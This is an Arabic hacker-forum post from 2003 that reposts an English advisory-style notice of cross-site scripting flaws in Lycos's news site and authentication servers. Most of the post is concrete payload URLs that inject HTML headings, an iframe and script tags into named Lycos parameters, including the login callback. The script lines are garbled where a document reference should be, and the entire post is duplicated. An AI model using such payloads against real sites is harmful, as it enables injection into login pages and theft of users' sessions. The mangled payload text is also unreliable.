القرصان
15-06-2003, 03:07
ثغرة في News Server للايكوس
SUMMARY
تسمح للهكر البعيد أن يعدل في الشفرة أو الكود التي تتولّى عمليّة الدّخول ................"يدوياً".
A cross site security vulnerability has been discovered in Lycos's
Authentication servers. The vulnerability allows remote attacker to inject
code into the form that handles the login process.
DETAILS
Examples: أمثلة:
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
H1>xss in Lycos WebSites</h1>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
script>alert(document.&@#&@#&@#&@#&@#&@#);</script>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
iframe></iframe>
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">< h1>XSS in Lycos
Authenticating Servers</h1>< a href="
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><
script>alert(document.&@#&@#&@#&@#&@#&@#);</script>
*********************
*****مع تحيات*****
القرصــــــ|4|ــــــان
*********************
SUMMARY
تسمح للهكر البعيد أن يعدل في الشفرة أو الكود التي تتولّى عمليّة الدّخول ................"يدوياً".
A cross site security vulnerability has been discovered in Lycos's
Authentication servers. The vulnerability allows remote attacker to inject
code into the form that handles the login process.
DETAILS
Examples: أمثلة:
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
H1>xss in Lycos WebSites</h1>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
script>alert(document.&@#&@#&@#&@#&@#&@#);</script>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
iframe></iframe>
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">< h1>XSS in Lycos
Authenticating Servers</h1>< a href="
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><
script>alert(document.&@#&@#&@#&@#&@#&@#);</script>
*********************
*****مع تحيات*****
القرصــــــ|4|ــــــان
*********************